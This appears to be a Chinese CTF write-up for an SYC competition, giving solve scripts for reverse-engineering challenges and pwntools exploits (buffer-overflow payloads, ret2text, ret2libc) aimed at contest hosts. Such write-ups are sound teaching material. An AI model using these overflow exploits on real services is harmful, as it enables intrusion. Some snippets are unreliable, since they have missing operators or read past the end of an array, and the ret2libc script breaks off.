前言

第一次和Jay17师傅搭档,被带飞咯,呜呜呜TuT~~~~~
羡慕会web的师傅

Reverse

shiftjmp

去花,打包,反编译
file

a = [  0x53, 0x58, 0x41, 0x78, 0x53, 0x36, 0x6A, 0x64, 0x38, 0x64, 
  0x6F, 0x54, 0x78, 0x42, 0x51, 0x7B, 0x78, 0x22, 0x4D, 0x61, 
  0x27, 0x63, 0x73, 0x45, 0x2D, 0x7C, 0x45, 0x6C, 0x2C, 0x6F, 
  0x2F, 0x7B, 0x5E, 0x5C, 0x00]

flag = ''

for i in range(len(a)):
    flag += chr(a[i] ^ i)

print(flag)

#SYC{W3lc0me_tO_th3_r3veR5e_w0r1d~}

点击就送的逆向题

先对文件进行编译
file
分析,获取flag
file

a = 'Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM'
flag = ''
for i in range(len(a)):
    flag += chr(ord(a[i]) - 7)

print(flag)

# SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF
# flag:SYC{TQWEFGHYIICIOJKLBNMCVBFGHSDFF}

easymath

爆破flag字符串,逐个拼接猜测

#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;

int matrix[25] = {18, 29, 16, 19, 27, 8, 31, 8, 23, 30, 29, 3, 28, 10, 21, 18, 29, 8, 16, 28, 11, 30, 7, 20, 7};
int last[30] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 19, 22, 26, 27, 28, 29, 31, 32, 50, 51, 52, 53, 54, 55};
unsigned int ans[66] = {0};
int v7[5][5] = {0};

char tabel[] = "01234_asdzxcpoityumnbAOZWXGMY";

int main () {
    for (int i = 0 ; i <= 4 ; i ++ ) {
        for (int x1 = 1 ; x1 < 30 ; x1 ++ ) {
            for (int x2 = 1 ; x2 < 30 ; x2 ++ ) {
                for (int x3 = 1 ; x3 < 30 ; x3 ++ ) {
                    for (int x4 = 1 ; x4 < 30 ; x4 ++ ) {
                        for (int x5 = 1 ; x5 < 30; x5 ++ ) {

                            int flag = 1;

                            for (int j = 0 ; j <= 4 ; j ++ ) {

                                v7[i][j] = 0;
                                ans[5 * i + 0 ] = last[x1];
                                ans[5 * i + 1 ] = last[x2];
                                ans[5 * i + 2 ] = last[x3];
                                ans[5 * i + 3 ] = last[x4];
                                ans[5 * i + 4 ] = last[x5];
                                for (int k = 0 ; k <= 4 ; k ++ ) {
                                    v7[i][j] = (v7[i][j] + ans[5 * i + k] * matrix[5 * k + j]) & 0x1f;
                                }
                                if (i == j && v7[i][j] != 1) {
                                    flag = 0;
                                    break;
                                }
                                if (i != j && v7[i][j]) {
                                    flag = 0;
                                    break;
                                }
                            }
                            if (flag) {
                                printf("%c%c%c%c%c,", tabel[x1 - 1], tabel[x2 - 1], tabel[x3 - 1], tabel[x4 - 1], tabel[x5 - 1]);
                            }
                        }
                    }
                }
            }
        }
        cout << endl;
    }
}

file
最终得到flag为xtd4co_ymiunbbx3Aypsmbzii
(一个个测试出来的,没看之后的更新附件,所有会有多解情况)

幸运数字

和exe交互爆破,因为提示字符中含有SYC字符,这里我们需要绕过一下

import subprocess

for i in range(1000):
    enc = str(i)
    process = subprocess.Popen("c:\\Users\\yu\\Desktop\\幸运数字.exe", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    input_data = enc.encode('utf-8')
    process.stdin.write(input_data)
    process.stdin.flush()
    output, error = process.communicate()
    try:
        flag = output.decode('gbk')
        if flag.count("SYC") >= 2:
            print("Correct flag found:", flag)
            exit(0)
    except:
        pass

# SYC{C0ngratulati0nnnns_You_gAessEd_R1ght}

听说cpp很难

找到关键算法处
file
file
连猜带蒙编写脚本

a = [0x4D, 0x5F, 0x3D, 0x85, 0x37, 0x68, 0x73, 0x57,
     0x27, 0x68, 0x51, 0x59, 0x7F, 0x26, 0x6B, 0x59, 
     0x73, 0x57, 0x55, 0x5B, 0x59, 0x6F, 0x6A, 0x59, 
     0x27, 0x57, 0x72, 0x57, 0x4F, 0x57, 0x78, 0x78, 0x83]

flag = ''

for i in range(len(a)):
    flag += chr(((a[i] + 10) ^ 10) - 10)

print(flag)

# SYC{Anma1nG_y0u_maKe_it_1alaIa~~}

后面的-10是和SYC包裹匹配出来的

砍树

先用jadx打开分析,
file
so文件的分析
file
大概猜测逻辑为输入和7为的key异或,直接猜测key为Syclove

a = [ 0x00, 0x20, 0x20, 0x17, 0x1B, 0x36, 0x0E, 0x36, 0x26, 0x17, 
  0x04, 0x2A, 0x29, 0x07, 0x26, 0x15, 0x52, 0x33, 0x2D, 0x0F, 
  0x3A, 0x27, 0x11, 0x06, 0x33, 0x07, 0x46, 0x17, 0x3D, 0x0A, 
  0x3C, 0x38, 0x2E, 0x22, 0x18]
key = 'Syclove'

flag = ''

for i in range(len(a)):
    flag += chr(a[i] ^ ord(key[i % 7]))

print(flag)

# SYC{t@ke_thE_bul1_By_the_h0rns_TAT}

flower-or-tea

去花,打包,反编译
file
file
修改了输出的tea

#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;

int delta = 0x31415927;
void decrypt(uint32_t* v, uint32_t* k) {

    uint32_t v3 = v[0];
    uint32_t v4 = v[1];
    uint32_t sum = (54 * delta) & 0xffffffff;

    int i = 0;
    for (i = 0; i < 54; i++) {
        sum -= delta;
        v3 -= (k[sum & 3] + sum) ^ (v4 + ((v4 >> 5) ^ (16 * v4)));
        v4 -= sum ^ (k[(sum >> 11) & 3] + sum) ^ (v3 + ((v3 >> 5) ^ (16 * v3)));
    }

    v[0] = v3;
    v[1] = v4;

}

int main() {
    uint32_t key[4] = { 32, 27, 39, 44 };
    uint32_t array[38] = { 0x9AF9464B, 0xC417B89E, 0xB217A713, 0xC93BA9E8, 0x94F3E44E, 0xB5CC2AB5, 0x4451E42C, 0x7A8A289A, 0x53C8D008, 0x6E117B49, 0x9BFFD794, 0x5EFF2DF9, 0x17E72531, 0xDFBD9979, 0x8F871B3A, 0x73E8C5AC, 0xB28670A6, 0x5AF6A369, 0x2CF7DA24, 0x347B66AF, 0xB9C84D60, 0x911E912F, 0xBD5A2F9B, 0xCB96733A, 0xC59968BE, 0xA00013E9, 0xC12F4EA4, 0xDE863A10, 0xA0C4D594, 0x4380983C, 0x7E2F7648, 0xE54DDC89, 0x3F27A690, 0xB58D3199, 0x604AE517, 0x9C903984, 0xF4E04481, 0x3CF4EDFF}; //密码数据
    uint32_t temp[2] = { 0 };
    int i = 0;
    for (i = 0; i < 38; i += 2) {

        temp[0] = array[i];
        temp[1] = array[i + 1];
        decrypt(temp, key);

        printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));

    }

    return 0;
}

file
得到一个乱序的字符串,重新排序即可

a = 'S}Y?C?{ADe0t__Yro3vw_o1liFk_ek_nTioR_d'
flag1 , flag2 = '',''

for i in range(len(a)//2):
    flag1 += a[i * 2]
    flag2 += a[i * 2 + 1]

print(flag1,flag2)

# SYC{D0_Yov_1ike_To_ }??Aet_r3wolF_kniRd

print(flag1+flag2[::-1])

# SYC{D0_Yov_1ike_To_dRink_Flow3r_teA??}

myself

调试过smc,修改函数返回地址
file
打包,找到tea加密
file

#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;

int delta = 0x61C88647;
void decrypt(uint32_t* v, uint32_t* k) {

    uint32_t v3 = v[0];
    uint32_t v4 = v[1];
    uint32_t sum = ((32 * -delta) & 0xffffffff);

    int i = 0;
    for (i = 0; i < 32; i++) {
        v4 -= ((v3 >> 5) + k[3]) ^ (16 * v3 + k[2]) ^ (sum + v3);
        v3 -= ((v4 >> 5) + k[0]) ^ (16 * v4 + k[1]) ^ (sum + v4);
        sum += delta;
    }

    v[0] = v3;
    v[1] = v4;

}

int main() {
    uint32_t key[4] = { 2, 2, 3, 4 };
    uint32_t array[] = { 0x0BDBDF9F0, 0x0E26194C4, 0x80799125, 0x1F0FC219, 0x0EB6A1815, 0x84F572C5, 0x40CC3A85, 0x0D2A32ABB}; //密码数据
    uint32_t temp[2] = { 0 };
    int i = 0;
    for (i = 0; i < 38; i += 2) {

        temp[0] = array[i];
        temp[1] = array[i + 1];
        decrypt(temp, key);

        printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));

    }

    return 0;
}

rainrow

d810去混淆
file

a = [0x65, 0x58, 0x41, 0x8E, 0x50, 0x44, 0x7B, 0x62, 0x57, 0x4A, 
  0x7E, 0x54, 0x49, 0x6C, 0x7D, 0x84, 0x4F, 0x5B, 0x95, 0x60, 
  0x60, 0x64, 0x77, 0x48, 0x7D, 0x4D, 0x7B, 0x9F, 0x68, 0x3C, 
  0x2D, 0x62]

b = []
flag = ''

for i in range(len(a)):
    b.append(a[i] ^ i)
    if i % 3 == 0:
        flag += chr(b[i] - 18)
    else:
        flag += chr(b[i])

print(flag)

# SYC{TAke_1t_3asy_Just_a_STart!!}

或者用angr爆破

import angr
import sys

def main(argv):
    path_to_binary = './rainbow'
    project = angr.Project(path_to_binary)
    initial_state = project.factory.entry_state(
        add_options={
            angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,
            angr.options.SYMBOL_FILL_UNCONSTRAINED_REGISTERS
        }
    )
    simulation = project.factory.simgr(initial_state)

    def is_successful(state):
        stdout_output = state.posix.dumps(sys.stdout.fileno())
        return b'You win!sunshine after the rain!' in stdout_output

    def should_abort(state):
        stdout_output = state.posix.dumps(sys.stdout.fileno())
        return b'Try again!' in stdout_output or b'Oops!Check your input length.' in stdout_output

    simulation.explore(find=is_successful, avoid=should_abort)

    if simulation.found:
        solution_state = simulation.found[0]
        print(solution_state.posix.dumps(sys.stdin.fileno()).decode())
    else:
        raise Exception('Could not find the solution')

if __name__ == '__main__':
    main(sys.argv)

小黄鸭

pyc拆包,反编译
file
直接开爆有一位错误,直接开猜

arr = '~h|p4gs`gJdN`thPwR`jDn`te1w`2|RNH'
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789}{_'
flag = ''
for i in range(len(arr)):
    for j in range(len(a)):
        if a[j].isalpha():
            c = a[j]
            c = chr(ord(c) + 13 - 26 if ord(c) + 13 > (90 if c <= 'Z' else 122) else ord(c) + 13)
            b = chr(ord(c) + 2)
        else:
            b = chr(ord(a[j]) + 1)
        if b == arr[i]:
            flag += a[j]
            break
print(flag[::-1])

# SYCm1_h0pe_yOu_ChAse_YoUr_dr3ams}
# SYC{1_h0pe_yOu_ChAse_YoUr_dr3ams}

寻找未来初音

go语言,开调,百度搜索未来初音色为0x39c5bb
RC4加密,idapython一把梭

from idaapi import *
addr = 0x61FD10     #输入的地址
a = [0x25, 0x6F, 0x3D, 0x6C, 0xF9, 0xE0, 0xCF, 0x3F, 0x2E, 
0x24, 0xC6, 0x7B, 0x81, 0xBF, 0x55, 0x4F, 0x0D, 0x99, 
0x87, 0x47, 0x48, 0xF7, 0xB9, 0x98, 0xFB, 0x1B, 0x22, 0xEC, 0x84, 0x23, 0xFD, 0xB2]
for i in range(len(a)):
    patch_byte(addr+i,a[i])

浪漫至死不渝

找到关键代码
file
可知对key进行的栅栏加密,然后对输入的下表进行判断,然后与key异或,最后加10或者加99
file

a = [125, 130, 131, 122, 117, 110, 123, 125, 130, 131, 122, 117, 110, 123, 99, 99, 99, 99]
key = "5201314WXHN"
for i in range(len(a)):
    if i < 14:
        a[i] -= 10
        a[i] ^= ord(key[i%7])
    else:
        a[i] -= 99
        a[i] ^= ord(key[i-7])

flag = ''
for i in range(len(a)):
    flag += chr(a[i])

print(flag)

#FJIAXUEFJIAXUEWXHN

AES!AES?

关键代码
file
file
file
分析可知,程序将我们的输入截成了两段进行加密,但加密过程都相同,根据伪C搓出exp即可

#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;

unsigned char key[32] = {0x64, 0x6F, 0x5F, 0x79, 0x6F, 0x75, 0x5F, 0x6B, 0x6F, 0x6E, 0x77, 0x5F, 0x53, 0x59, 0x43, 0x3F, 0x27, 0xC7, 0x90, 0xCF, 0xC7, 0xE8, 0x90, 0x14, 0xC7, 0xF1, 0x82, 0x90, 0xBE, 0x92, 0x59, 0x4A};
unsigned char S[256] = {0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16};
unsigned char enc[32] = {0xE0, 0x05, 0x6E, 0xC2, 0x6E, 0x99, 0x68, 0x45, 0x7D, 0x1F, 0x3F, 0xF9, 0x97, 0x76, 0x3B, 0x92, 0x47, 0x44, 0x06, 0x67, 0xA8, 0xEB, 0xEC, 0x4A, 0x6F, 0xE8, 0x35, 0xF9, 0xAC, 0xA7, 0x8C, 0x71};

void ShiftRow() {
    unsigned char v1;
//  前15个字符
    for (int i = 0; i < 16; i += 4) {
        for (int j = i / 4; j > 0; j--) {
            v1 = enc[i + 3];
            for (int k = 2; k >= 0; k--) {
                enc[i + k + 1] = enc[i + k];
            }
            enc[i] = v1;
        }
    }
//  剩余字符
    for (int i = 16; i < 32; i += 4) {
        for (int j = (i - 16) / 4; j > 0; j--) {
            v1 = enc[i + 3];
            for (int k = 2; k >= 0; k--) {
                enc[i + k + 1] = enc[i + k];
            }
            enc[i] = v1;
        }
    }
}

void SBOX() {
    for (int i = 0; i < 32; i++) {
        for (int j = 0; j < 256; j++) {
            if (enc[i] == S[j]) {
                enc[i] = j;
                break;
            }
        }
    }
}

int SBOXINtranform(unsigned char a) {
    for (int i = 0; i < 256; i++) {
        if (a == S[i]) {
            return i;
        }
    }
    return -1;
}

void tranform() {
    unsigned char v5[32] = {0x00};
    int v9 = 16;
    for (int j = 3; j >= 0; j--) {
        for (int k = 3; k >= 0; k--) {
            v9--;
            unsigned char a1 = enc[v9];
            int v2 = SBOXINtranform(a1);
            v5[4 * k + j] = v2;
        }
    }
    v9 = 32;
    for (int j = 3; j >= 0; j--) {
        for (int k = 3; k >= 0; k--) {
            v9--;
            unsigned char a1 = enc[v9];
            int v2 = SBOXINtranform(a1);
            v5[16 + 4 * k + j] = v2;
        }
    }

    for (int i = 0; i < 32; i++) {
        enc[i] = v5[i];
    }
}

int main() {

    for (int i = 0; i < 16; i++) {
        enc[i] ^= key[16 + i];
        enc[i + 16] ^= key[16 + i];
    }
    ShiftRow();
    SBOX();
    for (int i = 0; i < 16; i++) {
        enc[i] ^= key[i];
        enc[i + 16] ^= key[i];
    }
    tranform();
    ShiftRow();
    SBOX();

    for (int i = 0; i < 32; i++) {
        printf("%c", enc[i]);
    }

    return 0;
}

//SYC{0.o_Thls_1s_?t_A3s_(q^_^p)}

ezandroid

file
先对程序做个简单的分析,找到关键代码,还原代码,即可得到一段flag

#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;

void decrypt(int *v, int *k) {
    int v0 = v[0], v1 = v[2], v2 = v[1], sum = 0x9E3779B9 * 64, i;
    int delta = 0x9E3779B9;
    int k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (i = 0; i < 32; i++) {
        v1 -= (((v2 << 4) + k2) ^ (v2 + sum)) ^ ((v2 >> 5) + k3);
        v2 -= (((v1 << 4) + k0) ^ (v1 + sum)) ^ ((v1 >> 5) + k1);
        sum -= delta;
    }

    for (i = 0; i < 32; i++) {
        v1 -= (((v0 << 4) + k2) ^ (v0 + sum)) ^ ((v0 >> 5) + k3);
        v0 -= (((v1 << 4) + k0) ^ (v1 + sum)) ^ ((v1 >> 5) + k1);
        sum -= delta;
    }
    v[0] = v0;
    v[1] = v1;
    v[2] = v2;
}

void swap(char* x, char* y) {
    char temp = *x;
    *x = *y;
    *y = temp;
}

int main() {
    char enc[12] = {-91, -8, -110, -55, -49, 75, 115, 13, -76, -113, 102, 80};
    int key[4] = {2023708229, -158607964, -2120859654, 1167043672};
    for (int i = 0; i < 3; i++) {
        swap(&enc[4 * i], &enc[4 * i + 3]);
        swap(&enc[4 * i + 1], &enc[4 * i + 2]);
    }
    int *flag1 = (int *)enc;
    decrypt(flag1, key);
    for (int i = 0; i < 3; i++) {
        swap(&enc[4 * i], &enc[4 * i + 3]);
        swap(&enc[4 * i + 1], &enc[4 * i + 2]);
    }
    for (int i = 0; i < 12; i++) {
        putchar(enc[i]);
    }
    return 0;
}

//T0Vt33Tn0itr

file
这边是另一段,一个简单的异或

a = [-91, -8, -110, -55, -49, 75, 115, 13, -76, -113, 102, 80]
b = [-107, -106, -95, -115, -119, 127, 26, 121, -62, -20, 86, 9]

for i in range(len(b)):
    print(chr(a[i] ^ b[i]),end='')

# 0n3DF4itvc0Y

最后将两段字符串交叉拼接即可获得flag

a = 'T0Vt33Tn0itr'
b = '0n3DF4itvc0Y'

flag = ''
for i in range(len(a)):
    flag += a[i]
    flag += b[i]

print(flag)

# T00nV3tD3F34Tint0vict0rY

是男人就来扎针

Unity开发的游戏,主要逆向点在于Assembly-CSharp文件使用DNSPY打开

file

主要逻辑代码,到100分输出flag,但是每次鼠标点击事件都会导致flag更新,所以我们要更改代码模拟鼠标点击时间
filefile
在看到GameOver函数全部改为flase

file

保存之后运行游戏就可以了
file

Pwn

nc_pwntools

pwntools的基本用法

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',31163)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/')

chooselibc = 0
pwnlibc = 0
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b main')          #断点调试
#gdb.attach(io,'b *$rebase(0x128B)')  #PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

io.send(b'a'(99 - 7) + b'Syclover')
io.recvuntil(b'((')
num1 = int(io.recvuntil(b'-',drop=True),10)
num2 = int(io.recvuntil(b')',drop=True),10)
num3 = int(io.recvuntil(b')% ',drop=True),10)
num4 = int(io.recvuntil(b'=',drop=True),10)
io.sendline(str(((num1 - num2)num3)%num4))

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

password

爆破

for i in range(1000):
    io = remote('pwn.node.game.sycsec.com',31200)
    payload = b'a' * 0x28 + p64(0x4012F3)
    io.sendlineafter(b'name:\n',payload)

    io.sendlineafter(b'password:\n','')

    a = io.recvline()
    if b"Wrong password!\n" in a:
        io.close()
    elif b"Correct password!" in a:
        io.interactive()

ret2text

开了pie,直接修改最后两位返回地址到后面函数

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/ret2text')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('pwn.node.game.sycsec.com',30492)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/ret2text')

chooselibc = 0
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x126F)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

payload = b'a' * 0x58 + p8(0x27)
io.send(payload)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

write1

调试计算输入的值

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/chal')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32892)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/chal')

chooselibc = 0
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x401290') #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

backdoor = 0x401225

io.sendline(b'a')

#25 = 4d + x
io.sendlineafter('index:',str(0x28))
io.sendlineafter('value:',b'-28')

#12 = 13 + x
io.sendlineafter('index:',str(0x29))
io.sendlineafter('value:',b'-1')

io.sendlineafter('index:',str(-1))

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

ret2libc

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/chal')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('pwn.node.game.sycsec.com',30492)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/chal')

chooselibc = 0
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
